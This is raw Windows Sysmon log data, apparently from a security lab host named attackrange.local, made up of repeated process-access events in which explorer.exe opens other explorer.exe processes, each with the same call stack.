16:58:29.733{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5DF5-603E-54A8-00000000AD01}9088C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002246322Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.733{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5DF5-603E-54A8-00000000AD01}9088C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002246321Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.733{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5DF5-603E-54A8-00000000AD01}9088C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002246320Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.733{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5DF5-603E-54A8-00000000AD01}9088C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002246319Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.733{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5DF5-603E-54A8-00000000AD01}9088C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002246318Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.733{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5DB8-603E-4BA8-00000000AD01}8092C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002246317Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.733{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5DB8-603E-4BA8-00000000AD01}8092C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002246316Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.733{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5DB8-603E-4BA8-00000000AD01}8092C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002246315Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.733{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5DB8-603E-4BA8-00000000AD01}8092C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002246314Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.733{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5DB8-603E-4BA8-00000000AD01}8092C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002246313Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.733{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5DB8-603E-4BA8-00000000AD01}8092C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002246312Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.733{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5DB8-603E-4BA8-00000000AD01}8092C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002246311Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.733{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5DB8-603E-4BA8-00000000AD01}8092C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002246310Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.733{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5DB8-603E-4BA8-00000000AD01}8092C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002246309Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.733{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5DB8-603E-4BA8-00000000AD01}8092C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002246308Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.733{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5C8D-603E-26A8-00000000AD01}9012C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002246307Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.733{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5C8D-603E-26A8-00000000AD01}9012C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002246306Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.733{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5C8D-603E-26A8-00000000AD01}9012C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002246305Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.733{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5C8D-603E-26A8-00000000AD01}9012C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002246304Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.733{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5C8D-603E-26A8-00000000AD01}9012C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002246303Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.733{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5C8D-603E-26A8-00000000AD01}9012C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002246302Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 